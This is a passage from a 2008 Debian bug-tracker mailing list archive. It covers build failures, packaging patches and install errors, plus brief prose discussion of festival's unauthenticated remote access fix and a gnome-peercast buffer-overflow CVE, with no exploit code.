Bug#465619: marked as done (libterm-readline-gnu-perl: FTBFS: Failed 3/3 test scripts, 0.00% okay. 190/193 subtests failed, 1.55% okay.)
Your message dated Tue, 19 Feb 2008 13:02:04 + with message-id [EMAIL PROTECTED] and subject line Bug#465619: fixed in libterm-readline-gnu-perl 1.17a-2 has caused the Debian Bug report #465619, regarding libterm-readline-gnu-perl: FTBFS: Failed 3/3 test scripts, 0.00% okay. 190/193 subtests failed, 1.55% okay. to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 465619: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465619 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: libterm-readline-gnu-perl Version: 1.17a-1 Severity: serious User: [EMAIL PROTECTED] Usertags: qa-ftbfs-20080212 qa-ftbfs Justification: FTBFS on i386 Hi, During a rebuild of all packages in sid, your package failed to build on i386. Relevant part: make[1]: Entering directory `/build/user/libterm-readline-gnu-perl-1.17a' PERL_DL_NONLAZY=1 /usr/bin/perl -MExtUtils::Command::MM -e test_harness(0, 'blib/lib', 'blib/arch') t/*.t t/callbackCannot open /dev/tty for read at t/callback.t line 31 dubious Test returned status 6 (wstat 1536, 0x600) DIED. FAILED tests 2-7 Failed 6/7 tests, 14.29% okay t/history.Cannot open /dev/tty for read at t/history.t line 50 dubious Test returned status 6 (wstat 1536, 0x600) DIED. FAILED tests 2-82 Failed 81/82 tests, 1.22% okay t/readlineCannot open /dev/tty for read at t/readline.t line 55 dubious Test returned status 6 (wstat 1536, 0x600) DIED. FAILED tests 2-104 Failed 103/104 tests, 0.96% okay Failed Test Stat Wstat Total Fail Failed List of Failed --- t/callback.t6 1536 7 12 171.43% 2-7 t/history.t 6 153682 162 197.56% 2-82 t/readline.t6 1536 104 206 198.08% 2-104 Failed 3/3 test scripts, 0.00% okay. 190/193 subtests failed, 1.55% okay. make[1]: *** [test_dynamic] Error 6 The full build log is available from: http://people.debian.org/~lucas/logs/2008/02/12 A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot containing a sid i386 environment. Internet was not accessible from the build systems. -- | Lucas Nussbaum | [EMAIL PROTECTED] http://www.lucas-nussbaum.net/ | | jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: libterm-readline-gnu-perl Source-Version: 1.17a-2 We believe that the bug you reported is fixed in the latest version of libterm-readline-gnu-perl, which is due to be installed in the Debian FTP archive: libterm-readline-gnu-perl_1.17a-2.diff.gz to pool/main/libt/libterm-readline-gnu-perl/libterm-readline-gnu-perl_1.17a-2.diff.gz libterm-readline-gnu-perl_1.17a-2.dsc to pool/main/libt/libterm-readline-gnu-perl/libterm-readline-gnu-perl_1.17a-2.dsc libterm-readline-gnu-perl_1.17a-2_amd64.deb to pool/main/libt/libterm-readline-gnu-perl/libterm-readline-gnu-perl_1.17a-2_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Niko Tyni [EMAIL PROTECTED] (supplier of updated libterm-readline-gnu-perl package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Tue, 19 Feb 2008 14:41:04 +0200 Source: libterm-readline-gnu-perl Binary: libterm-readline-gnu-perl Architecture: source amd64 Version: 1.17a-2 Distribution: unstable Urgency: low Maintainer: Debian Perl Group [EMAIL PROTECTED] Changed-By: Niko Tyni [EMAIL PROTECTED] Description: libterm-readline-gnu-perl - Perl extension for the GNU Readline/History Library Closes: 465619 Changes: libterm-readline-gnu-perl (1.17a-2) unstable; urgency=low . * Disable the test suite again, it needs an interactive terminal to run. (Closes: #465619) * Switch to my @debian.org email address. Files: 4e9353980375c1fe6191db79627b2c67 1105 perl optional libterm-readline-gnu-perl_1.17a-2.dsc ffafae85f5bdd6e12d915feb1ab38404 6296 perl optional libterm-readline-gnu-perl_1.17a-2.diff.gz
Bug#465997: bash overwrites /bin/sh symlink
Am 2008-02-15 22:14:44, schrieb Patrick Schoenfeld: Package: bash Version: 3.1dfsg-9 Severity: serious Hi, I had /bin/sh pointing to /bin/dash for several reasons. On the last upgrade it has been overwritten with a link to /bin/bash. IMHO this is really bad. For lenny its probably even worse, because using dash as a new /bin/sh is a release goal. But this is impossible with a package with priority requires that discriminates other shells and the decisions of the local system administrator. For this reason I consider this bug release-critical and therefore set the severity to serious. May someone lower it if I'm wrong. Normaly debconf ask, whether you want to install /bin/bash as /bin/sh. Maybe you have confirmed to fast? Thanks, Greetings and nice Day Michelle Konzack Systemadministrator Tamay Dogan Network Debian GNU/Linux Consultant -- Linux-User #280138 with the Linux Counter, http://counter.li.org/ # Debian GNU/Linux Consultant # Michelle Konzack Apt. 917 ICQ #328449886 +49/177/935194750, rue de Soultz MSN LinuxMichi +33/6/61925193 67100 Strasbourg/France IRC #Debian (irc.icq.com) signature.pgp Description: Digital signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tue, 19 Feb 2008, Kumar Appaiah wrote: On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote: Hi Tim, this is somehow strange, this CVE id was already fixed in 1.4.3-21 referring to the security tracker (see bug #435445 for reference). Did this fix got lost somewhere in the package history? It appears that the troublesome issue of running festival as a less privileged user was handled in the last upload. However, what was not handled was the restriction of accesss to localhost by default, and the necessity to introduce a password for this purpose. The last upload, which Tim has checked a few times, introduces this feature, and thus, makes the security aspect a bit more complete. Hope this is fine. Thanks for the follow up. This is my impression too. Gentoo introduced localhost restrictions in their patch for the original issue, in addition to changing the init process of the server so that it run under its own privileges rather than root- they didn't add authentication though. The Debian patch only changed the init process of the server, which while preventing a full root compromise, did not prevent remote unauthenticated access. Looking at the previous bug history there was some discussion about disabling the system command too, but IMO this does little to fix the underlying problem of an unauthenticated scheme interpreter bound to a remote port with no ACLs or authentication. Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#445507: not working on mipsel - initrd not starting
On Sat, Oct 20, 2007 at 09:52:52PM +0200, Bastian Blank wrote: On Sat, Oct 20, 2007 at 09:18:24PM +0200, Bastian Blank wrote: | $ ./lib/ld.so.1 --library-path lib/ ./bin/sh | Segmentation fault | $ LD_LIBRARY_PATH=lib/ ./bin/sh | | | BusyBox v1.1.3 (Debian 1:1.1.3-5) Built-in shell (ash) | Enter 'help' for a list of built-in commands. | $ /lib/ld.so.1 --library-path lib/ ./bin/sh | Segmentation fault The problem comes from the following symbols in libc.so.6 l *UND* .hidden __nss_aliases_database l *UND* .hidden __nss_rpc_database l *UND* .hidden __nss_ethers_database l *UND* .hidden __nss_netgroup_database l *UND* .hidden __nss_shadow_database l *UND* .hidden __nss_publickey_database Those symbols are glibc symbols that are not used within the reduced libc. They are exported as undefined on all architectures, though they are defined in libc_p.a. On most architectures, they do not cause any problem, but on mips and mipsel ld.so seems to be confused and segfault during the relocation phase. Thiemo, do you have an idea about what can lead to segfault? Also note that in Etch those symbols were also undefined, but not hidden. I guess this is the reason why mklibs stopped working. A quick workaround is to mark those functions as used by using the -u options from gcc as it is done for other symbols. It only increase the size of libc.so.6 by a few kilobytes, and I have tested that it actually works correctly. -- .''`. Aurelien Jarno | GPG: 1024D/F1BCDB73 : :' : Debian developer | Electrical Engineer `. `' [EMAIL PROTECTED] | [EMAIL PROTECTED] `-people.debian.org/~aurel32 | www.aurel32.net -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466557: amap: fails to install correctly
Package: amap Version: 4.8-1 Severity: grave Justification: renders package unusable I don't have much to say about that. The package doesn't want to install. I have not investigated. Upgrading trigger, response and rpc files ... Running Online Update for fingerprints, connecting to www.thc.org/thc-amap Error: file could not be found by web server: HTTP/1.1 302 Found Date: Tue, 19 Feb 2008 09:44:13 GMT Server: Apache Location: http://freeworld.thc.org/appdefs.resp Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 !DOCTYPE HTML PUBLIC -//IETF//DTD HTML 2.0//EN htmlhead title302 Found/title /headbody h1Found/h1 pThe document has moved a href=http://freeworld.thc.org/appdefs.resp;here/a./p hr addressApache Server at www.thc.org Port 80/address /body/html dpkg: error processing amap (--configure): subprocess post-installation script returned error exit status 255 Errors were encountered while processing: amap E: Sub-process /usr/bin/dpkg returned an error code (1) -- System Information: Debian Release: lenny/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.23.9systemtap-moka0 (PREEMPT) Locale: LANG=en_CA.UTF-8, LC_CTYPE=en_CA.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages amap depends on: ii libc62.7-8 GNU C Library: Shared libraries ii libssl0.9.7 0.9.7k-3.1etch1 SSL shared libraries amap recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466519: ltrace of an svn update
On Tue, Feb 19, 2008 at 10:03:48AM +, Ivan Sergio Borgonovo wrote: I noticed in the other bug report it was asked to include an ltrace... This is the ltrace of an svn update. You had libc6-dbg installed when you ran it ? because I see no libc calls which is odd. A strace may help too please. TIA -- ·O· Pierre Habouzit ··O[EMAIL PROTECTED] OOOhttp://www.madism.org pgpDJZ0lDpKSe.pgp Description: PGP signature
Bug#466519: svn client doesn't work: Could not get next bucket brigade + Invalid or incomplete multibyte or wid...: random no commit, no update
Ivan Sergio Borgonovo a écrit : Package: libc6 Version: 2.3.6.ds1-13etch5 Severity: grave Summary: svn was working perfectly. The repository isn't huge (~500 commit). Now when I commit I get: Could not get next bucket brigade (server side) when I update I get: client denied by server configuration: /var/www/ This really looks like a problem on the server side. Could not fetch resource information. (84)Invalid or incomplete multibyte or wide character: Requests for a collection must have a trailing slash on the URI. On the client side I get: REPORT di '/svn/main/!svn/vcc/default': 400 Bad Request I did a svnadmin verify and svnadmin recover and everything looked fine on the server. I did try fsfsverify.py on all revs too. Sometimes backing up a file on the local copy, forcing a delete, adding the file back works... sometimes it doesn't. I've been able to commit file one by one, some get committed with no extra hassle, some need this backup/delete/add process, some just can't be committed. I did try to make a commit from other boxes and they worked... I did a co from other boxes and they worked too. the server is a debian sarge (pentium) Debian sarge (Apache/2.0.54 (Debian GNU/Linux) DAV/2 SVN/1.1.4) the client is a debian etch (dual Xeon) svn, versione 1.4.2 (r22196) compilato Nov 10 2006, 17:39:50 Nothing was changed on the server, most recent update were on the client (etch) and coincidentally I haven't been able to use svn starting from the below update on the client. linux-image-2.6-686 2.6.18+6etch2 - 2.6.18+6etch3 apache2 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2-mpm-prefork 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2-utils 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2.2-common 2.2.3-4+etch3 - 2.2.3-4+etch4 cpio 2.6-17 - 2.6-18 libc6 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 libc6-dev 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 libc6-xen 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 locales 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 Have you tried to downgrade libc6 packages to the old version? I really doubt this problem is due to the glibc upgrade. -- .''`. Aurelien Jarno | GPG: 1024D/F1BCDB73 : :' : Debian developer | Electrical Engineer `. `' [EMAIL PROTECTED] | [EMAIL PROTECTED] `-people.debian.org/~aurel32 | www.aurel32.net -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466487: libauthen-smb-perl: should this package be orphaned or removed?
Hi there, Original maintainer piping in. I definitely don't have the interest or time to maintain this package. Please mark it orphaned, or remove it from the archive. I suspect it's been quite a long time since anyone found it useful. Will Lowe [EMAIL PROTECTED] On Feb 19, 2008, at 7:43 AM, Gunnar Wolf wrote: Barry deFreese dijo [Mon, Feb 18, 2008 at 11:14:59PM -0500]: Package: libauthen-smb-perl Version: 0.91-3 Severity: serious User: [EMAIL PROTECTED] Usertags: proposed-orphan Dear Maintainer, While reviewing some packages, your package came up as a package that should maybe be orphaned by its maintainer, because: * Maintainer seems inactive. Last upload was 2004. * RC bug older than 60 days. * I am unable to find an upstream source. I have searched CPAN and with google. * Package is severely out of date. * Popcon of 82. Hi, I'm cc:ing this message to the pkg-perl group - we might end up adopting/hijacking the package ;-) You can get the newest upstream version of the package at CPAN ([1, 2]). The package _is_ at the newest upstream revision. If you think that it should be removed from Debian instead of being orphaned, please reply to this bug and tell so. If you disagree and want to continue to maintain this package, please close this bug and do an upload also fixing the other issues. Also, you can study the possibility of taking co-maintainers. I don't have a compelling reason to jump and adopt this package; however, I know many modules in the Authen::* namespace were recently grabbed by Xavier Oswald. Xavier, or anybody in the group: Are you interested? :) Greetings, [1] http://search.cpan.org/~pmkane/Authen-Smb-0.91/Smb.pm [2] http://search.cpan.org/CPAN/authors/id/P/PM/PMKANE/Authen-Smb-0.91.tar.gz -- Gunnar Wolf - [EMAIL PROTECTED] - (+52-55)5623-0154 / 1451-2244 PGP key 1024D/8BB527AF 2001-10-23 Fingerprint: 0C79 D2D1 2C4E 9CE4 5973 F800 D80E F35A 8BB5 27AF -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466519: close: it seems not related
I started to experience the same problem on other boxes too... Update of libc6 and this problem now just seem an unlucky coincidence. sorry -- Ivan Sergio Borgonovo http://www.webthatworks.it -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#462651: please fix or respond
On Fri, Feb 15, 2008 at 02:34:23PM +0100, Helmut Grohne wrote: Hi Martin, this is a maintainer ping mail. Please respond in any way. If you don't respond within a week, I'll ask d-mentors to sponsor my proposed patch as nmu. Helmut Hello Helmut, thank you for your patch; I will upload a fixed package tomorrow. Sorry for the long delay; i've been on work and was not able to access my gpg key nor did I find time to answer. m. -- Toto, I've got a feeling we're not in Kansas anymore.
Bug#465748: I see this problem too.
I'm beating my head against the wall on this problem too. Wasn't this install tested in any way/shape form before being pushed out? I've been playing with dpkg to try to see the status of how the byte-compiling works and what error(s) there are during this process. Going to be an interesting debug process. John [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466487: libauthen-smb-perl: should this package be orphaned or removed?
Barry deFreese dijo [Mon, Feb 18, 2008 at 11:14:59PM -0500]: Package: libauthen-smb-perl Version: 0.91-3 Severity: serious User: [EMAIL PROTECTED] Usertags: proposed-orphan Dear Maintainer, While reviewing some packages, your package came up as a package that should maybe be orphaned by its maintainer, because: * Maintainer seems inactive. Last upload was 2004. * RC bug older than 60 days. * I am unable to find an upstream source. I have searched CPAN and with google. * Package is severely out of date. * Popcon of 82. Hi, I'm cc:ing this message to the pkg-perl group - we might end up adopting/hijacking the package ;-) You can get the newest upstream version of the package at CPAN ([1, 2]). The package _is_ at the newest upstream revision. If you think that it should be removed from Debian instead of being orphaned, please reply to this bug and tell so. If you disagree and want to continue to maintain this package, please close this bug and do an upload also fixing the other issues. Also, you can study the possibility of taking co-maintainers. I don't have a compelling reason to jump and adopt this package; however, I know many modules in the Authen::* namespace were recently grabbed by Xavier Oswald. Xavier, or anybody in the group: Are you interested? :) Greetings, [1] http://search.cpan.org/~pmkane/Authen-Smb-0.91/Smb.pm [2] http://search.cpan.org/CPAN/authors/id/P/PM/PMKANE/Authen-Smb-0.91.tar.gz -- Gunnar Wolf - [EMAIL PROTECTED] - (+52-55)5623-0154 / 1451-2244 PGP key 1024D/8BB527AF 2001-10-23 Fingerprint: 0C79 D2D1 2C4E 9CE4 5973 F800 D80E F35A 8BB5 27AF -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466519: ltrace of an svn update
On Tue, 19 Feb 2008 15:45:45 +0100 Pierre Habouzit [EMAIL PROTECTED] wrote: On Tue, Feb 19, 2008 at 10:03:48AM +, Ivan Sergio Borgonovo wrote: I noticed in the other bug report it was asked to include an ltrace... This is the ltrace of an svn update. You had libc6-dbg installed when you ran it ? because I see no libc calls which is odd. A strace may help too please. I installed -dgb on purpose... unfortunately I can't test with older libc6 (I don't have them anymore) and well nothing has changed other than that upgrade. There are other stuff in the last upgrade of that box... but they do look even less related. I've tried to use svn clients from other different hosts on the same server and everything is working... this exclude a corruption in the svn repo and should exclude a network problems on the server. I really don't know where to find another culprit. Server and client cfg was unchanged. I just edited a couple of php projects. I've disabled the firewall. And all this happened just upgrading the packages in the previous post. Committing from other clients now have been tested to be reliable... while I can't still commit from that client after the above mentioned upgrade. It could be a chance... definitively a strange chance. Attached the strace... -- Ivan Sergio Borgonovo http://www.webthatworks.it svn.strace Description: Binary data
Bug#456862: marked as done (hdf5: FTBFS: dpkg-shlibdeps: failure: couldn't find library libh5test-1.6.5.so.0 needed by debian/hdf5-tools/usr/bin/h5perf (its RPATH is '').)
Your message dated Tue, 19 Feb 2008 17:47:04 + with message-id [EMAIL PROTECTED] and subject line Bug#456862: fixed in hdf5 1.6.5-5.1 has caused the Debian Bug report #456862, regarding hdf5: FTBFS: dpkg-shlibdeps: failure: couldn't find library libh5test-1.6.5.so.0 needed by debian/hdf5-tools/usr/bin/h5perf (its RPATH is ''). to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 456862: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=456862 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: hdf5 version: 1.6.5-5 Severity: serious User: [EMAIL PROTECTED] Usertags: qa-ftbfs-20071217 qa-ftbfs Justification: FTBFS on i386 Hi, During a rebuild of all packages in sid, your package failed to build on i386. Relevant part: make[3]: Entering directory `/build/user/hdf5-1.6.5/debian/build-mpich/examples' ../../../bin/mkdirs /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c + /usr/bin/install -c -m 644 ../../../examples/h5_chunk_read.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_compound.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_extend_write.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_group.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_read.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_write.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_select.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_attribute.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_mount.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_reference.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/h5_drivers.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. + /usr/bin/install -c -m 644 ../../../examples/ph5example.c /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/doc/hdf5/examples/c/. make[3]: Leaving directory `/build/user/hdf5-1.6.5/debian/build-mpich/examples' make[2]: Leaving directory `/build/user/hdf5-1.6.5/debian/build-mpich' PATH=$PATH:/sbin ldconfig -n /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/lib -- Libraries have been installed in: /build/user/hdf5-1.6.5/debian/build-mpich/tmpinst/usr/lib If you ever happen to want to link against installed libraries in a given directory, LIBDIR, you must either use libtool, and specify the full pathname of the library, or use the `-LLIBDIR' flag during linking and do at least one of the following: - add LIBDIR to the `LD_LIBRARY_PATH' environment variable during execution - add LIBDIR to the `LD_RUN_PATH' environment variable during linking - use the `-Wl,--rpath -Wl,LIBDIR' linker flag - have your system administrator add LIBDIR to `/etc/ld.so.conf' See any operating system documentation about shared libraries for more information, such as the ld(1) and ld.so(8) manual pages. -- make[1]: Leaving directory `/build/user/hdf5-1.6.5/debian/build-mpich' dh_install -plibhdf5-mpich-1.6.5-0 -plibhdf5-mpich-dev \ --sourcedir=debian/build-mpich/tmpinst dh_testdir dh_testroot dh_installdocs -a dh_installman -a dh_installchangelogs -a -k release_docs/RELEASE.txt dh_link -a dh_strip -a dh_compress -a dh_fixperms -a dh_makeshlibs -plibhdf5-lam-1.6.5-0 -V libhdf5-lam-1.6.5-0 dh_makeshlibs -plibhdf5-mpich-1.6.5-0 -V libhdf5-mpich-1.6.5-0 dh_installdeb -a dh_shlibdeps -phdf5-tools -Llibhdf5-serial-1.6.5-0 -ldebian/libhdf5-serial-1.6.5-0/usr/lib dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/gif2h5 shouldn't be linked with libpthread.so.0 (it uses none of its symbols). dpkg-shlibdeps: warning:
Bug#463393: marked as done (hdf5: FTBFS: missing library libh5test-1.6.5.so.0)
Your message dated Tue, 19 Feb 2008 17:47:04 + with message-id [EMAIL PROTECTED] and subject line Bug#463393: fixed in hdf5 1.6.5-5.1 has caused the Debian Bug report #463393, regarding hdf5: FTBFS: missing library libh5test-1.6.5.so.0 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 463393: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=463393 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: hdf5 Version: 1.6.5-5 Severity: serious Tags: patch Greetings, The binary h5perf in the hdf5-tools package requires the library libh5test-1.6.5.so.0 which is not in any binary package. With hdf5-tools installed, this results in: # /usr/bin/h5perf h5perf: error while loading shared libraries: libh5test-1.6.5.so.0: cannot open shared object file: No such file or directory Because of this, dh_shlibdeps is failing: dh_shlibdeps -phdf5-tools -Llibhdf5-serial-1.6.5-0 -ldebian/libhdf5-serial-1.6.5-0/usr/lib dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/gif2h5 shouldn't be linked with libpthread.so.0 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/gif2h5 shouldn't be linked with libz.so.1 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/gif2h5 shouldn't be linked with libm.so.6 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5dump shouldn't be linked with libpthread.so.0 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5dump shouldn't be linked with libz.so.1 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5dump shouldn't be linked with libm.so.6 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h52gif shouldn't be linked with libpthread.so.0 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h52gif shouldn't be linked with libz.so.1 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h52gif shouldn't be linked with libm.so.6 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5jam shouldn't be linked with libpthread.so.0 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5jam shouldn't be linked with libz.so.1 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5jam shouldn't be linked with libm.so.6 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5import shouldn't be linked with libpthread.so.0 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5import shouldn't be linked with libz.so.1 (it uses none of its symbols). dpkg-shlibdeps: warning: debian/hdf5-tools/usr/bin/h5import shouldn't be linked with libm.so.6 (it uses none of its symbols). dpkg-shlibdeps: failure: couldn't find library libh5test-1.6.5.so.0 needed by debian/hdf5-tools/usr/bin/h5perf (its RPATH is ''). Note: libraries are not searched in other binary packages that do not have any shlibs or symbols file. To help dpkg-shlibdeps find private libraries, you might need to set LD_LIBRARY_PATH. dh_shlibdeps: command returned error code 512 make: *** [binary-arch] Error 1 It seems dh_shlibdeps has become stricter, so this now causes FTBFS, which is RC. :-( Note the library is sitting right in the test directory. Aha, it defines PUB_LIB= so PUB_LIB=$(LIB) is ignored. The attached patch fixes this, and makes the install_shlib and install_devlib files more general so it gets installed in the package. Now the package builds, and the result is: # /usr/bin/h5perf No parallel IO performance because parallel is not configured Cheers, -Adam -- GPG fingerprint: D54D 1AEE B11C CE9B A02B C5DD 526F 01E8 564E E4B6 Engineering consulting with open source tools http://www.opennovation.com/ --- hdf5-1.6.5/test/Makefile.in~ 2005-07-21 14:49:03.0 + +++ hdf5-1.6.5/test/Makefile.in 2008-01-30 23:01:19.0 + @@ -39,7 +39,6 @@ LIB=libh5test.la LIB_SRC=h5test.c testframe.c LIB_OBJ=$(LIB_SRC:.c=.lo) -PUB_LIB= ## Temporary files. These files are the ones created by setting the ## HDF5_NOCLEANUP environment variable and running `make test' without --- hdf5-1.6.5/debian/install_shlib~ 2008-01-30 23:58:30.0 + +++ hdf5-1.6.5/debian/install_shlib 2008-01-30 23:59:03.0 + @@ -1 +1 @@ -usr/lib/libhdf5*.so.* +usr/lib/libh*.so.* --- hdf5-1.6.5/debian/install_devlib~ 2008-01-30 23:58:30.0 + +++ hdf5-1.6.5/debian/install_devlib 2008-01-30 23:59:54.0
Bug#466539: gnome-peercast: CVE-2007-6454 heap-based buffer overflow possibly leading to code execution
Le Tuesday 19 February 2008 14:08:46 Thijs Kinkhorst, vous avez écrit : As a side note, I've already done a lot of things to try to fix this, but upstream seems not to care at all, and didn't maintain this package for 1 year (last upload was my NMU)... So am I right to conclude that we'd better remove this package rather than to try and fix it? Well, popcon is not zero, but unless maintainer is willing to support it (he is upstream too), then yes, that's my point too. Romain
Bug#464060: Mplayer font after update
Hi, there is maybe another bug in the mplayer package. after security upgrade, in version mplayer/1.0~rc2-7+lenny1, subtitle fonts are bad. I use Dejavu font and subtitles are n cp1250 encoding. Then, after installing mplayer package from stable everything works well. Is there any change, or were can be the problem ? If you need some better description, please contact me. Thank you Martin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#464315: Intent to NMU
Tags 464315 +pending
thanks.
I have prepared an NMU that fixes this FTBFS bug, and also gets the package
in better shape (new Standards Version, only one lintian warning, and it's
buildable twice in a row.
I'm attaching the debdiff output of the patch I have prepared. Since this
is not only for the RC bug, I'll upload the package I've prepared to the
7-day delayed queue. This means it should be entering unstable by February
26th.
--
Besos, ,''`.
Marga : :' :
`. `'
`-
diff -u libtemplates-parser-10.0+20060522/debian/changelog libtemplates-parser-10.0+20060522/debian/changelog
--- libtemplates-parser-10.0+20060522/debian/changelog
+++ libtemplates-parser-10.0+20060522/debian/changelog
@@ -1,3 +1,18 @@
+libtemplates-parser (10.0+20060522-5.1) unstable; urgency=low
+
+ * Non-maintainer upload to fix Failure To Build From Source.
+ * Added patches/fix-tail-call.patch to use the new standard in the
+call to the tail command. Closes: #464315.
+ * Updated Standards-Version to 3.7.3:
+- Changed {Source-Version} for {binary:Version} in the -dev dependency
+ * Fixed lintian warnings:
+- Added Section: libs to the Source package
+- Added 'compat' file with a value of 4, removed it from debian/rules
+ * debian/rules: added a rule in the clean target to remove the .pc
+directory generated by quilt.
+
+ -- Margarita Manterola [EMAIL PROTECTED] Tue, 19 Feb 2008 18:05:52 +
+
libtemplates-parser (10.0+20060522-5) unstable; urgency=low
* debian/rules: add an empty binary-indep target. Closes: #395713.
diff -u libtemplates-parser-10.0+20060522/debian/control libtemplates-parser-10.0+20060522/debian/control
--- libtemplates-parser-10.0+20060522/debian/control
